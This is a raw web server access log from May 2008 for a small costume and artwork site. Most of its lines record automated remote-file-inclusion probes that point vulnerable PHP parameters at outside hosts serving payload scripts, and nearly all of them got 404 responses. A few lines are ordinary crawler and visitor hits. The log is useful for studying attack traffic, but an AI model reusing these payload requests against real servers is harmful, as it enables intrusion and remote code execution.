72.16.148.38 - - [23/May/2008:04:19:01 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
62.75.193.90 - - [23/May/2008:04:24:56 -0500] "GET /logs/access_log.1207180800/errors.php?error=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
62.75.193.90 - - [23/May/2008:04:24:57 -0500] "GET /errors.php?error=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
62.75.193.90 - - [23/May/2008:04:24:57 -0500] "GET /logs/errors.php?error=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
69.16.242.144 - - [23/May/2008:04:25:01 -0500] "GET /logs/access_log.1207785600//modules/My_eGallery/index.php?basepath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:04:25:01 -0500] "GET //modules/My_eGallery/index.php?basepath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:04:25:01 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
72.16.148.38 - - [23/May/2008:04:25:04 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
72.16.148.38 - - [23/May/2008:04:25:05 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
217.67.26.84 - - [23/May/2008:04:27:35 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:04:27:35 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:04:27:35 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:04:27:36 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
72.16.148.38 - - [23/May/2008:04:32:22 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
72.16.148.38 - - [23/May/2008:04:32:22 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
72.16.148.38 - - [23/May/2008:04:32:23 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
72.16.148.38 - - [23/May/2008:04:32:23 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
87.106.220.178 - - [23/May/2008:04:32:51 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.78.216.197 - - [23/May/2008:04:35:32 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.812"
66.249.67.211 - - [23/May/2008:04:37:18 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.106.220.178 - - [23/May/2008:04:38:46 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
87.106.220.178 - - [23/May/2008:04:38:46 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.78.216.197 - - [23/May/2008:04:39:16 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.812"
82.78.216.197 - - [23/May/2008:04:39:16 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.812"
211.51.62.221 - - [23/May/2008:04:40:18 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
209.164.178.178 - - [23/May/2008:04:41:10 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
209.164.178.178 - - [23/May/2008:04:41:10 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
65.55.208.130 - - [23/May/2008:04:46:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [23/May/2008:04:46:49 -0500] "GET /artwork/toys.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.190.21.74 - - [23/May/2008:04:48:22 -0500] "GET /logs/access_log.1207785600////errors.php?error=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
209.190.21.74 - - [23/May/2008:04:48:22 -0500] "GET ////errors.php?error=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
209.190.21.74 - - [23/May/2008:04:48:23 -0500] "GET /logs////errors.php?error=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
209.190.21.74 - - [23/May/2008:04:48:49 -0500] "GET /logs/access_log.1207180800////errors.php?error=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
58.26.137.64 - - [23/May/2008:04:50:35 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.69"
58.26.137.64 - - [23/May/2008:04:50:35 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.69"
203.22.204.188 - - [23/May/2008:04:53:15 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
203.22.204.188 - - [23/May/2008:04:53:15 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
66.7.205.39 - - [23/May/2008:04:54:34 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
66.7.205.39 - - [23/May/2008:04:54:34 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
66.7.205.39 - - [23/May/2008:04:54:34 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.7.205.39 - - [23/May/2008:04:54:40 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
65.36.252.34 - - [23/May/2008:04:55:36 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
65.36.252.34 - - [23/May/2008:04:55:36 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
202.131.92.138 - - [23/May/2008:04:55:40 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
202.131.92.138 - - [23/May/2008:04:55:40 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
203.22.204.188 - - [23/May/2008:04:55:52 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
203.22.204.188 - - [23/May/2008:04:57:11 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
203.22.204.188 - - [23/May/2008:04:57:11 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
211.51.62.221 - - [23/May/2008:04:57:18 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
211.51.62.221 - - [23/May/2008:04:57:19 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
211.58.255.95 - - [23/May/2008:04:57:25 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
211.58.255.95 - - [23/May/2008:04:57:25 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
213.195.65.239 - - [23/May/2008:05:01:35 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
213.195.65.239 - - [23/May/2008:05:01:35 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
87.112.55.115 - - [23/May/2008:05:02:11 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
87.112.55.115 - - [23/May/2008:05:02:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
87.112.55.115 - - [23/May/2008:05:02:22 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
87.112.55.115 - - [23/May/2008:05:02:23 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
87.112.55.115 - - [23/May/2008:05:02:23 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
87.112.55.115 - - [23/May/2008:05:02:24 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
87.106.220.178 - - [23/May/2008:05:03:30 -0500] "GET /logs/access_log.1207785600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
87.106.220.178 - - [23/May/2008:05:03:31 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.220.178 - - [23/May/2008:05:03:31 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
87.106.220.178 - - [23/May/2008:05:03:32 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
204.253.132.137 - - [23/May/2008:05:04:04 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
74.50.21.210 - - [23/May/2008:05:04:10 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
74.54.81.132 - - [23/May/2008:05:05:16 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
82.78.216.197 - - [23/May/2008:05:05:17 -0500] "GET /logs/access_log.1207785600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.812"
82.78.216.197 - - [23/May/2008:05:05:17 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.812"
82.78.216.197 - - [23/May/2008:05:05:17 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.812"
82.78.216.197 - - [23/May/2008:05:05:21 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.812"
99.175.236.97 - - [23/May/2008:05:06:08 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
208.116.44.60 - - [23/May/2008:05:07:34 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
208.116.44.60 - - [23/May/2008:05:07:34 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
70.87.81.18 - - [23/May/2008:05:07:55 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
70.87.81.18 - - [23/May/2008:05:07:55 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
65.55.208.131 - - [23/May/2008:05:14:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [23/May/2008:05:14:23 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.7.106 - - [23/May/2008:05:15:03 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.217 - - [23/May/2008:05:15:04 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.164.208.174 - - [23/May/2008:05:19:09 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dialer/1.10/ADSL; .NET CLR 2.0.50727; Dialer/1.10/ADSL)"
85.164.208.174 - - [23/May/2008:05:19:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dialer/1.10/ADSL; .NET CLR 2.0.50727; Dialer/1.10/ADSL)"
211.20.85.150 - - [23/May/2008:05:26:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
211.51.62.221 - - [23/May/2008:05:26:30 -0500] "GET /logs/access_log.1207785600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
211.51.62.221 - - [23/May/2008:05:26:30 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
211.51.62.221 - - [23/May/2008:05:26:31 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
211.51.62.221 - - [23/May/2008:05:26:31 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
72.52.136.89 - - [23/May/2008:05:29:47 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.52.136.89 - - [23/May/2008:05:29:47 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
65.36.252.34 - - [23/May/2008:05:29:53 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
65.36.252.34 - - [23/May/2008:05:29:53 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
65.36.252.34 - - [23/May/2008:05:29:53 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
203.22.204.188 - - [23/May/2008:05:29:54 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
203.22.204.188 - - [23/May/2008:05:29:54 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
203.22.204.188 - - [23/May/2008:05:29:54 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
65.36.252.34 - - [23/May/2008:05:30:05 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
203.22.204.188 - - [23/May/2008:05:30:07 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
74.53.137.18 - - [23/May/2008:05:37:15 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
74.53.137.18 - - [23/May/2008:05:37:15 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
74.53.137.18 - - [23/May/2008:05:37:15 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
74.53.137.18 - - [23/May/2008:05:37:25 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
74.50.21.210 - - [23/May/2008:05:39:23 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
74.50.21.210 - - [23/May/2008:05:39:24 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
74.50.21.210 - - [23/May/2008:05:39:24 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
74.50.21.210 - - [23/May/2008:05:39:36 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
74.54.81.132 - - [23/May/2008:05:40:09 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
74.54.81.132 - - [23/May/2008:05:40:09 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
74.54.81.132 - - [23/May/2008:05:40:09 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
74.54.81.132 - - [23/May/2008:05:40:20 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
70.87.81.18 - - [23/May/2008:05:41:18 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
70.87.81.18 - - [23/May/2008:05:41:19 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
70.87.81.18 - - [23/May/2008:05:41:19 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
70.87.81.18 - - [23/May/2008:05:41:35 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
211.58.255.95 - - [23/May/2008:05:42:01 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
211.58.255.95 - - [23/May/2008:05:42:01 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
211.58.255.95 - - [23/May/2008:05:42:02 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
211.58.255.95 - - [23/May/2008:05:45:03 -0500] "GET /logs/access_log.1207008000/modules/Neos_Chronos/header.php?base_folder=http://copelandpublishing.com.au/includes/romid.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
70.87.81.18 - - [23/May/2008:05:47:37 -0500] "GET /logs/errors.php?error=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
70.87.81.18 - - [23/May/2008:05:47:37 -0500] "GET /errors.php?error=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
217.67.26.84 - - [23/May/2008:05:48:53 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:05:48:53 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:05:49:42 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:05:49:43 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:05:49:43 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:05:49:47 -0500] "GET /logs/access_log.1204761600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:05:49:48 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
